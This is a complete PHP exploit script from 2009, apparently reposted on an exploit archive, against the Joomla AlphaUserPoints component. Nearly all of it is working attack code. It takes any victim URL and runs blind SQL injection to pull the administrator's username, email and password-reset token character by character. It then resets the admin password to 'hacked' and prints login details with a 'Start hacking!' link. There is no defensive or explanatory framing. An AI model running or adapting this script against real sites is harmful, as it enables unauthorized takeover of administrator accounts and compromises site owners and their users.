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Joomla Component AlphaUserPoints SQL Injection Exploit
====================================================== Joomla Component AlphaUserPoints SQL Injection Exploit ====================================================== <?php echo '<h2>Joomla Component AlphaUserPoints SQL Injection Exploit</h2>'; echo '<h4>jdc 2009</h4>'; echo '<fieldset><legend>Buffer</legend><div id="update" style="padding:8px;"></div></fieldset>'; echo '<script type="text/javascript">var update = document.getElementById("update");</script>'; ini_set( "memory_limit", "128M" ); ini_set( "max_execution_time", 0 ); set_time_limit( 0 ); if( !isset( $_GET['url'] ) ) die( 'Usage: '.$_SERVER['SCRIPT_NAME'].'?url=www.victim.com' ); $vulnerableFile = "http://".$_GET['url']."/components/com_alphauserpoints/assets/ajax/checkusername.php"; $url = $vulnerableFile; $data = array(); $admin = ''; $data['username2points'] = "1' AND 1=2 UNION SELECT id FROM #__users WHERE gid=25 ORDER BY id ASC LIMIT 1 -- '"; $output = getData(); echo 'Cheching for exploit...'; if( !testData( $output ) ) die( 'Failed. Target may have magic quotes on.' ); echo 'done!<br />'; if( isset( $_GET['check'] ) ) die( $output ); echo 'Getting admin username & email (this may take some time)...'; for( $i=1;$i<250;$i++ ) { $len = strlen( $admin ); $continue = FALSE; for( $j=32; $j<126; $j++ ) { if( $continue ) continue; $data = array( 'username2points' => "1' AND 1=2 UNION SELECT id FROM #__users WHERE gid=25 AND ASCII(SUBSTRING(CONCAT(username,0x3a,email),$i,1)) = $j ORDER BY id ASC LIMIT 1 -- '" ); $output = getData(); if( testData( $output ) ) { $admin .= chr( $j ); echo '<script type="text/javascript">update.innerHTML += "'.chr( $j ).'";</script>'; $continue = TRUE; } ob_end_flush(); ob_flush(); flush(); } if( $len == strlen( $admin ) ) break; } if( strlen( $admin ) == 0 ) die( 'failed!' ); echo '<script type="text/javascript">update.innerHTML = "";</script>'; echo "done!<br />"; echo "<h4>$admin</h4>"; $admin = explode( ':', $admin ); echo "<br />Generating token..."; $url = "http://".$_GET['url']."/index.php?option=com_user&view=reset&tmpl=component"; $data = array(); $token = preg_replace( array( '/\n/', '/(?:.*)name="([a-f0-9]{32})"(?:.*)/m' ), array( '', '$1' ), getData() ); if( strlen( $token ) != 32 ) die( 'failed!' ); echo 'done!<br />'; echo 'Resetting password...'; $url = "http://".$_GET['url']."/index.php?option=com_user&task=requestreset"; $data = array( 'email' => $admin[1], $token => 1 ); getData(); echo 'done!<br />'; echo 'Getting Reset Token...'; $url = $vulnerableFile; $data = array(); $activation = ''; for( $i=1;$i<100;$i++ ) { $len = strlen( $activation ); $continue = FALSE; for( $j=48; $j<126; $j++ ) { if( $continue ) continue; $data = array( 'username2points' => "1' AND 1=2 UNION SELECT id FROM #__users WHERE gid=25 AND ASCII(SUBSTRING(CONCAT(activation),$i,1)) = $j ORDER BY id ASC LIMIT 1 -- '" ); $output = getData(); if( testData( $output ) ) { $activation .= chr( $j ); echo '<script type="text/javascript">update.innerHTML += "'.chr( $j ).'";</script>'; $continue = TRUE; } ob_end_flush(); ob_flush(); flush(); } if( $len == strlen( $activation ) ) break; } if( strlen( $activation ) == 0 ) die( 'failed!' ); echo 'done!<br />'; echo 'Sending Reset Token...'; $url = "http://".$_GET['url']."/index.php?option=com_user&view=reset&layout=complete"; $data = array( 'token' => $activation, $token => 1 ); getData(); echo 'done!<br />'; echo 'Resetting Password to "hacked"...'; $url = "http://".$_GET['url']."/index.php?option=com_user&view=reset&layout=complete"; $data = array( 'password1' => 'hacked', 'password2' => 'hacked', $token => 1 ); getData(); echo 'done!<br />'; echo '<hr />'; echo 'You may now log in as admin using the following credentials:<br />'; echo '<strong>'.$admin[0].'</strong> / <strong>hacked</strong><br />'; echo '<a href="http://'.$_GET['url'].'/administrator/">Start hacking!</a>'; function shutUp( $buffer ) { return false; } function testData( $output ) { return preg_match( '/OK/', $output ); } function getData() { global $data, $url; ob_start( "shutUp" ); $ch = curl_init(); curl_setopt( $ch, CURL_TIMEOUT, 120 ); curl_setopt( $ch, CURL_RETURNTRANSFER, 0 ); curl_setopt( $ch, CURLOPT_URL, $url ); curl_setopt( $ch, CURLOPT_COOKIEFILE, 'aup.cookie.txt' ); curl_setopt( $ch, CURLOPT_COOKIEJAR, 'aup.cookie.txt' ); if( count( $data ) > 0 ) { curl_setopt( $ch, CURLOPT_POST, count( $data ) ); curl_setopt( $ch, CURLOPT_POSTFIELDS, http_build_query( $data ) ); } curl_setopt( $ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)" ); curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, 1 ); $result = curl_exec( $ch ); curl_close( $ch ); $return = ob_get_contents(); ob_end_clean(); return $return; } /* jdc 2009 */ # 0day.today [2024-12-23] #